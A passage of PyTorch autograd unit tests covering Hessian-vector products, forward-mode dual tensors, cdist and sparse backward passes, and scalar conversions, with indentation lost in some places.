        autogradF.hvp(scalar_fn, inp, torch.rand(5))
    with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
        autogradF.hvp(scalar_fn, inp, (v, 2))

    # Well-formed single-input call succeeds.
    res = autogradF.hvp(scalar_fn, inp, v)
    self._assert_same_struct(res[1], inp)

    # Well-formed multi-input call succeeds too.
    def two_input_fn(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()

    inp = (torch.rand(4), torch.rand(5))
    v = (torch.rand(4), torch.rand(5))
    res = autogradF.hvp(two_input_fn, inp, v)
    self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
    """strict=True surfaces disconnected/constant graphs; strict=False yields zeros."""
    def detached(a):
        return a.detach().sum()

    def disconnected(a):
        # Non-leaf Tensor that requires grad but is unrelated to the input.
        return a.long().float().requires_grad_().clone().sum()

    def linear(a):
        # Linear function: its jacobian does not depend on the input.
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)

    cases = [
        (detached, "Output 0 of the user-provided function does not require gradients."),
        (disconnected, "The output of the user-provided function is independent of input 0"),
        (linear, "jacobian of the user-provided function with respect to input 0 is"),
    ]
    for fn, pattern in cases:
        with self.assertRaisesRegex(RuntimeError, pattern):
            autogradF.hvp(fn, inp, v, strict=True)
        # Non-strict mode silently returns an all-zero hvp instead.
        res = autogradF.hvp(fn, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
    """hvp() runs under torch.no_grad(); create_graph=True still builds a graph."""
    def reducer(x):
        return x.exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)

    with torch.no_grad():
        out, hvp_val = autogradF.hvp(reducer, inputs, v)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(hvp_val.grad_fn)
    self.assertNotEqual(hvp_val, torch.zeros(4, 4))

    with torch.no_grad():
        out, hvp_val = autogradF.hvp(reducer, inputs, v, create_graph=True)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(hvp_val.grad_fn)
    self.assertNotEqual(hvp_val, torch.zeros(4, 4))
def test_hvp_output(self):
    """By default hvp() returns detached results whose structure matches the inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    out, hvp_val = autogradF.hvp(foo, inputs, v)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(hvp_val.grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    res = autogradF.hvp(bar, inputs, v)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNone(res[0].grad_fn)
    for part in res[1]:
        self.assertIsNone(part.grad_fn)
def test_hvp_scalar(self):
    """hvp() handles 0-dim inputs, an omitted v for scalars, and reshaped scalar outputs."""
    def reducer(x):
        return x.exp().sum()

    mat = torch.rand(4, 4)
    res = autogradF.hvp(reducer, mat, torch.ones(4, 4))
    self._assert_same_struct(res[1], mat)

    # 0-dim input: v may be 0-dim, or omitted entirely.
    scalar = torch.rand([])
    res = autogradF.hvp(reducer, scalar, torch.rand([]))
    self._assert_same_struct(res[1], scalar)
    res = autogradF.hvp(reducer, scalar)
    self._assert_same_struct(res[1], scalar)

    def bad_reducer(x):
        # Single element, but reshaped to rank 3 — still accepted.
        return x.exp().sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    res = autogradF.hvp(bad_reducer, mat, torch.rand(4, 4))
    self._assert_same_struct(res[1], mat)
def test_hvp_create_graph(self):
    """With create_graph=True both hvp() outputs are differentiable and pass
    gradcheck/gradgradcheck, for single and tuple inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.hvp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    # Both the function value and the hvp must carry a grad_fn.
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)
    gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(hvp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(hvp_val[0].grad_fn)
    self.assertIsNotNone(hvp_val[1].grad_fn)
    gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    def foo(*args):
        x, y = args[:2]
        v = args[2:]
        # Feed the hvp outputs into further ops to exercise double backward.
        x = x.cos()
        val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
    """jvp/vjp results agree with explicit products against the full jacobian."""
    def foo(x):
        return x ** 3 + x.sum()

    inputs = torch.rand(4)
    v = torch.rand(4)

    jac = autogradF.jacobian(foo, inputs)
    _, jvp_val = autogradF.jvp(foo, inputs, v)
    _, vjp_val = autogradF.vjp(foo, inputs, v)

    # J @ v (column form) and v^T @ J (row form).
    self.assertEqual(jvp_val, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
    self.assertEqual(vjp_val, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
    """hvp/vhp results agree with explicit products against the full hessian."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4)
    v = torch.rand(4)

    hes = autogradF.hessian(foo, inputs)
    _, hvp_val = autogradF.hvp(foo, inputs, v)
    _, vhp_val = autogradF.vhp(foo, inputs, v)

    # H @ v (column form) and v^T @ H (row form).
    self.assertEqual(hvp_val, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
    self.assertEqual(vhp_val, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
    """Tests for forward-mode AD (fwAD): dual-level lifecycle, dual Tensor
    packing/unpacking, printing, interaction with backward mode, view/inplace
    semantics, and cleanup of tangents when a level exits."""

    def tearDown(self):
        # Ensure that a failing test won't make others fail
        while fwAD._current_level >= 0:
            fwAD.exit_dual_level()

        super().tearDown()

    def test_forward_level_cleanup(self):
        """Exiting a dual level must not leak the C++ copy of a tangent."""
        def get_tensor_and_weak_ref():
            # Create a new Tensor and weak reference
            t = torch.rand(2, requires_grad=True)
            return t, torch._C._WeakTensorRef(t)

        # Sanity check that the helper function works as expected
        t, t_ref = get_tensor_and_weak_ref()
        self.assertFalse(t_ref.expired())

        del t
        self.assertTrue(t_ref.expired())

        # Main test code
        foo = torch.rand(2)

        with fwAD.dual_level():
            tangent, tangent_ref = get_tensor_and_weak_ref()
            self.assertFalse(tangent_ref.expired())

            dual = fwAD.make_dual(foo, tangent)
            self.assertFalse(tangent_ref.expired())

            # Make sure that the tangent we provided has been re-used as is
            self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)

            # Make sure that dual is keeping the tangent alive
            del tangent
            self.assertFalse(tangent_ref.expired())

            # Make sure that the dual level does not keep the c++
            # version of the tangent alive
            del dual
            self.assertTrue(tangent_ref.expired())

    def test_size_check(self):
        """make_dual requires the tangent's size to match the primal's."""
        foo = torch.rand(2)
        tangent = torch.rand(3)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
                dual = fwAD.make_dual(foo, tangent)

            # A matching-size slice of the tangent is accepted.
            dual = fwAD.make_dual(foo, tangent[1:])

    # The following test functions want to ensure all the following behaviors:
    #   - Ensure that default level system in the python binding works
    #   - Ensure that only level 0 exists and nesting is properly disabled
    #   - Ensure that printing works fine
    #   - Ensure that basic packing/unpacking works
    #   - Ensure that advanced packing/unpacking works
    #     - For memory / version counter share
    #     - For backward AD (regular ops)
    #   - Ensure that view + inplace for both modes work fine
    #   - Ensure we do proper cleanup on exit of a level

    def test_default_level(self):
        """Packing/unpacking inside a level; tangent is cleared after exit."""
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        # We don't actually need to enforce that these two are the exact same python
        # object, feel free to relax in the future
        self.assertIs(baz_tangent, bar)

        # After the level exits, the tangent is gone.
        baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        self.assertEqual(baz_tangent, None)

    def test_nested_level(self):
        """Only level 0 exists; entering a nested level raises."""
        with fwAD.dual_level() as level:
            # For now only level 0 exists
            self.assertEqual(level, 0)

        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
                nest_level = fwAD.enter_dual_level()

    def test_print(self):
        """Only dual Tensors show a 'tangent=' field when printed."""
        with fwAD.dual_level() as level:
            a = torch.rand(3)
            self.assertFalse("tangent=" in str(a))

            b = fwAD.make_dual(a, torch.rand(3))
            self.assertFalse("tangent=" in str(a))
            self.assertTrue("tangent=" in str(b))

            b_primal, b_tangent = fwAD.unpack_dual(b)
            self.assertFalse("tangent=" in str(b_primal))
            self.assertFalse("tangent=" in str(b_tangent))

    def test_basic_packing_unpacking(self):
        """Round-trip pack/unpack preserves primal and re-uses the tangent."""
        foo = torch.rand(2)
        bar = torch.rand(2)

        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            self.assertIs(baz_tangent, bar)

            # Check that packing/unpacking did not change the input
            foo_primal, foo_tangent = fwAD.unpack_dual(foo)
            self.assertEqual(foo_primal, foo)
            self.assertIsNone(foo_tangent)

    def test_advanced_packing_unpacking(self):
        """Duals alias the primal's storage/version counter and interact
        correctly with backward mode, detach()/detach_() and no_grad."""
        foo = torch.rand(2)
        bar = torch.ones(2)

        # Memory and version counter check
        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)

            # Ensure that they are sharing memory and version counter
            self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual._version)

            # Unpacking should only create aliases as well
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
            self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
            # And the tangent is actually re-used as-is so it is still the same Tensor
            self.assertIs(dual_tangent, bar)

            # Ensure we properly share the version counter
            self.assertEqual(foo._version, dual_primal._version)
            foo.add_(1)
            self.assertEqual(foo._version, dual_primal._version)
            self.assertEqual(bar._version, dual_tangent._version)
            bar.add_(1)
            self.assertEqual(bar._version, dual_tangent._version)

        # backward mode check
        with fwAD.dual_level():
            foo.requires_grad_()
            bar.requires_grad_()

            # Check that backward gradients properly propagates through packing/unpacking
            dual = fwAD.make_dual(foo, bar)
            p, t = fwAD.unpack_dual(dual)

            gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertEqual(gfoo, torch.ones_like(foo))
            self.assertIsNone(gbar)

            gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
            self.assertIsNone(gfoo)
            self.assertEqual(gbar, torch.ones_like(bar))

            # Check that forward gradients are impacted by detach()
            detached_dual = dual.detach()
            out = detached_dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

            # Check that forward gradients are not impacted by no_grad
            with torch.no_grad():
                out = dual * 3
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertFalse(t.requires_grad)
            self.assertEqual(p, foo * 3)
            self.assertEqual(t, bar * 3)

            # Check that forward gradients are not impacted by inplace detach
            dual = dual.clone()
            dual.detach_()
            out = dual * 2
            p, t = fwAD.unpack_dual(out)
            self.assertFalse(p.requires_grad)
            self.assertEqual(p, foo * 2)
            self.assertIsNone(t)

    def test_view_inplace_non_differentiable_views(self):
        """In-place ops on a dual update primal values everywhere, but must not
        propagate tangents into non (forward) differentiable views."""
        original_foo = torch.rand(2, dtype=torch.double)
        original_bar = torch.ones(2, dtype=torch.double)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Note that in this test, we use "update" to mean computing the right tangent for the dual
            # All the inplace operations here are expected to update the primal value of the Tensors but
            # not always their tangents.
            # Also all mentions of "non differentiable view" here means non forward differentiable view
            # unless specified otherwise.
            # See note [Forward Grad View/inplace] for more details on how these views work.

            # Check that inplace ops do not update non-differentiable views
            # Non differentiable view
            dual = fwAD.make_dual(foo, bar)
            dual *= 2
            # Check that non differentiable view's tangent was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that the computed result is correct
            self.assertEqual(bar, original_bar * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            self.assertEqual(foo, original_foo * 2)
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
            # Other non differentiable view
            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
            self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
            dual_primal *= 2
            # Ensure dual's tangent did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
            dual_tangent *= 2
            # Ensure dual's primal did not change
            self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
            self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)

    def test_view_inplace_differentiable_views(self):
        """In-place ops on forward-differentiable views propagate tangents to
        the base (and vice versa), stopping at non-differentiable views."""
        original_foo = torch.rand(2)
        original_bar = torch.ones(2)

        # Do clones to be able to compare the values updated inplace
        # with the original content of these Tensors
        foo = original_foo.clone()
        bar = original_bar.clone()

        with fwAD.dual_level():
            # Check that inplace ops do update differentiable view but stop at non differentiable ones
            # A non differentiable view
            dual = fwAD.make_dual(foo, bar)
            # A differentiable view
            view = dual.narrow(0, 0, 1)
            view *= 2
            # Check that non differentiable view was not updated
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            # Check that differentiable view was updated
            self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
            self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))

            # Check that we track differentiable view even for Tensors that are not dual
            baz = torch.rand(2)
            baz += dual
            self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])

            # Updates on view should as well
            baz = torch.rand(2)
            baz[0] = dual[0]
            self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
            # Unused values get a gradient of 0
            self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)

            # Check that forward non-differentiable views do prevent gradient update
            baz = torch.rand(2)
            view = baz.detach()
            view += dual
            self.assertIsNone(fwAD.unpack_dual(baz)[1])

    def test_grad_cleanup(self):
        """Exiting a level clears tangents; a new level starts clean."""
        foo = torch.rand(2)
        bar = torch.rand(2)
        baz = torch.rand(2)

        with fwAD.dual_level():
            dual = fwAD.make_dual(foo, bar)
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            self.assertIs(fwAD.unpack_dual(dual)[1], bar)

        # The old dual has lost its tangent once the level exited.
        self.assertIsNone(fwAD.unpack_dual(dual)[1])

        with fwAD.dual_level():
            self.assertIsNone(fwAD.unpack_dual(foo)[1])
            new_dual = fwAD.make_dual(foo, baz)

            dual_primal, dual_tangent = fwAD.unpack_dual(dual)
            new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
            self.assertEqual(dual_primal, new_dual_primal)
            self.assertIsNone(dual_tangent)
            self.assertEqual(new_dual_tangent, baz)

    def test_detach_view_tracking(self):
        """detach() produces a view that keeps neither forward nor backward
        graph alive, so the base can be freed."""
        # Default detach is both forward and backward non-differentiable
        foo = torch.rand(2)
        foo_weak = torch._C._WeakTensorRef(foo)

        out = foo.detach()

        del foo
        self.assertTrue(foo_weak.expired())
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
    """min/max/(nan)median spread the incoming gradient evenly across all
    tied extremal values (here: mass 1 split as 1/3 over three ties)."""
    for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
        x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
        # NOTE(review): x2 is created on the default (CPU) device even when
        # `device` is e.g. CUDA — possibly an oversight; confirm intent
        # before adding device=device (CUDA nan handling may differ).
        x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
        for x in [x1, x2]:
            y = f(x)
            y.backward()
            self.assertEqual(x.grad.sum(), 1.)
            self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
    """Backward through cdist on a large input runs successfully."""
    def _run_large_cdist(sizex, sizey=None):
        # Build x/y nudged apart so no pairwise distance sits at an extremum,
        # then backprop through cdist(p=2).
        if sizey is None:
            sizey = sizex
        x = torch.randn(sizex, device=device, dtype=torch.float)
        y = torch.randn(sizey, device=device, dtype=torch.float)
        eps = 1e-6
        # to avoid extremum
        x = x - (((x - y) < eps).float() * 2 * eps)
        x.requires_grad = True
        y.requires_grad = True
        # Do a backward pass to check that it is valid for large matrices.
        torch.cdist(x, y, p=2).sum().backward()

    _run_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
    """cdist backward stays NaN-free for p values below 1."""
    for p in (0.99, 0.7, 0.5, 0.1, 0.01):
        x = torch.randn(1, 2, device=device)
        # y differs from x along one coordinate only.
        y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
        x.requires_grad = True
        y.requires_grad = True
        dists = torch.cdist(x, y, p=p)
        dists.backward(torch.ones_like(dists))
        self.assertFalse(torch.isnan(x.grad).any())
        self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
    """cdist backward must stay finite when x == y (all pairwise distances 0).

    Regression test for invalid values (nan/inf) in the gradient at the
    non-differentiable point dist == 0.
    """
    sizex = (1, 27, 32)
    # NOTE(review): `p` is never forwarded to torch.cdist below, so every
    # iteration exercises the default p=2 path — confirm whether forwarding
    # p=p was intended before changing the call.
    for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
        x = torch.randn(sizex, device=device, dtype=torch.float)
        dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
        y = x.clone()
        x.requires_grad = True
        d = torch.cdist(x, y)
        d.backward(dist_grad)
        # Check that the backward pass does not contain invalid values such
        # as nan or inf. Use a unittest assertion instead of a bare
        # `assert`, which is stripped when Python runs with -O.
        self.assertTrue(torch.isfinite(x.grad).all())
def test_parameter_resize(self, device):
    """Backward still works after a Parameter is shrunk in place via set_()."""
    param = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
    for _ in range(2):
        # Shrink the parameter by one element each round; the stale grad
        # must be dropped so the next backward can allocate a fresh one.
        with torch.no_grad():
            param.set_(param[1:])
            param.grad = None
        torch.cat((param, param)).sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
    """gradcheck through sparse_coo_tensor construction + values() getter,
    over all combinations of empty/non-empty indices, values and nnz."""
    # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
    def _test(size, sparse_dim, nnz, device):
        # Random integer indices within `size`, built from uniform floats.
        v_size = [nnz] + list(size[sparse_dim:])
        i = torch.rand(sparse_dim, nnz)
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)
        inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
        other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
                                     dtype=dtype)[0]
        def fn(v):
            # Round-trip: build sparse from v, add, coalesce, transform
            # values, rebuild, and return the coalesced values.
            x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
            y = (x + other).coalesce()
            yv = y.values()
            new_v = yv.tanh()
            z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
            return z.coalesce().values()
        gradcheck(fn, (inp,), check_batched_grad=False)
        # FIXME: make gradgradcheck work.
        # gradgradcheck(fn, (inp,), check_batched_grad=False)
        # assert that _values is non-differentiable
        with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
            other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
    # Exercise all 8 combinations of empty indices/values/nnz.
    for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
        sparse_size = [] if empty_i else [2, 1]
        dense_size = [1, 0, 2] if empty_v else [1, 2]
        nnz = 0 if empty_nnz else 5
        _test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
    """Sparse and dense gradients flowing into the same leaf must accumulate
    correctly regardless of the order in which they arrive."""
    class FixedGradientFunction(Function):
        # Identity forward; backward returns a pre-chosen gradient so the
        # test controls exactly which (sparse/dense) grads get summed.
        @staticmethod
        def forward(ctx, x, grad_x):
            ctx.save_for_backward(grad_x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            saved_grad_x, = ctx.saved_tensors
            return saved_grad_x, None

    size = torch.Size([6, 3, 2])
    i1 = torch.tensor([
        [0, 3, 4],
        [0, 2, 2],
    ], dtype=torch.long)
    v1 = make_tensor([3, 2], dtype=dtype, device=device)
    sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
    i2 = torch.tensor([
        [0, 1, 3, 4],
        [0, 1, 2, 2],
    ], dtype=torch.long)
    v2 = make_tensor([4, 2], dtype=dtype, device=device)
    sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
    dense_grad = torch.rand(size, device=device, dtype=dtype)
    fn = FixedGradientFunction

    # sparse first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # dense first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # sparse only
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
    """Gradient of sparse_mask flows only through the unmasked entries."""
    dense = torch.randn(3, requires_grad=True, device=device)
    mask = torch.ones(3, device=device)
    mask[1] = 0
    sparse_mask = mask.to_sparse()
    masked = dense.sparse_mask(sparse_mask).to_dense()
    masked.sum().backward()
    # The masked-out position (index 1) receives zero gradient.
    self.assertEqual(dense.grad, sparse_mask.to_dense())
def test_pyscalar_conversions(self, device):
    """Conversions between single-element Tensors and Python scalars:
    int()/float()/bool() round-trips, precision loss, and error cases
    (nan -> ValueError, +/-inf -> OverflowError on integral conversion)."""
    def _test_pyscalar_conversions(t, integral_conv):
        # integral -> integral
        l = t(torch.zeros(1, 1, 1, dtype=torch.long))
        pyscalar = -12345
        l[0] = pyscalar
        self.assertEqual(integral_conv(l), pyscalar)

        # floating point -> floating point
        f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
        pyscalar = -12345.1
        f[0] = pyscalar
        self.assertEqual(float(f), pyscalar)
        f[0] = nan
        self.assertTrue(math.isnan(float(f)))
        f[0] = inf
        self.assertEqual(float(f), inf)
        f[0] = -inf
        self.assertEqual(float(f), -inf)

        # integral -> floating point
        # check we can convert something that loses precision
        pyscalar = 1234567890123456789
        self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
        l[0] = pyscalar
        self.assertEqual(float(l), float(pyscalar))

        # floating point -> integral
        f[0] = nan
        self.assertRaises(ValueError, lambda: integral_conv(f[0]))
        f[0] = inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = -inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = sys.float_info.max
        self.assertEqual(integral_conv(f), sys.float_info.max)

        # bool, nonzero
        def test_nonzero(tensor, value, expected):
            tensor[0] = value
            self.assertEqual(expected, bool(tensor))
            self.assertEqual(expected, True if tensor else False)

        test_nonzero(l, 0, False)
        test_nonzero(l, -2, True)
        test_nonzero(f, 0.0, False)
        test_nonzero(f, sys.float_info.min, True)
        test_nonzero(f, nan, bool(nan))
        test_nonzero(f, inf, bool(inf))
        test_nonzero(f, -inf, bool(-inf))

    # Run the whole battery on a tensor moved to the target device.
    _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
    """Enabling requires_grad is only legal on floating-point tensors."""
    def f1():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad_()

    def f2():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad = True

    def f3():
        torch.ones(1, dtype=dtype, device=device, requires_grad=True)

    a = torch.ones(1, dtype=dtype, device=device)
    a.requires_grad = False  # should always work
    a.requires_grad_(False)

    for f in [f1, f2, f3]:
        if dtype.is_floating_point:
            f()
        else:
            with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
                f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
    """Backward through advanced indexing on a large tensor (gh-22843)."""
    # See https://github.com/pytorch/pytorch/issues/22843
    n = (1 << 16)
    x = torch.rand(n, 1, device=device, requires_grad=True)
    selected = x[:, [0]]
    selected.sum().backward()
    self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
    """Helper: an error in the CPU parent graph must stop the reentrant GPU child graph."""
    t1 = torch.rand([3, 3], requires_grad=True)
    t2 = torch.rand([3, 3], device=device, requires_grad=True)
    t3 = torch.rand([3, 3], device=device, requires_grad=True)

    # Parent cpu graph.
    t4 = t1 * t1
    t5 = TestAutograd.SimulateBackwardError.apply(t4)

    # Child gpu graph (much longer than parent graph).
    prev = t2 * t2
    for i in range(10):
        prev = prev * t2
    reentrant_root = prev

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will take much longer.
            reentrant_root.backward()
            return grad

    # Parent gpu graph.
    t6 = ReentrantFunc.apply(t3)
    t7 = t6 * t6

    # Parent graph will error out first, while child graph will continue executing.
    with self.assertRaisesRegex(Exception, "Simulate error"):
        torch.autograd.backward([t5.sum(), t7.sum()])

    # No grads should be accumulated since child graph will stop execution
    # after parent receives error.
    self.assertIsNone(t2.grad)
    self.assertIsNone(t1.grad)
    self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
    """A failed reentrant backward must not leak CUDA memory."""
    before = CudaMemoryLeakCheck.get_cuda_memory_usage()
    # Run as separate function so that gc can clean up everything when we
    # check for memory usage.
    self._test_reentrant_parent_error_on_cpu(device)
    # Give the autograd thread up to 30s to clean up failed tasks.
    after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    deadline = time.time() + 30
    while before != after and time.time() < deadline:
        time.sleep(0.1)
        after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
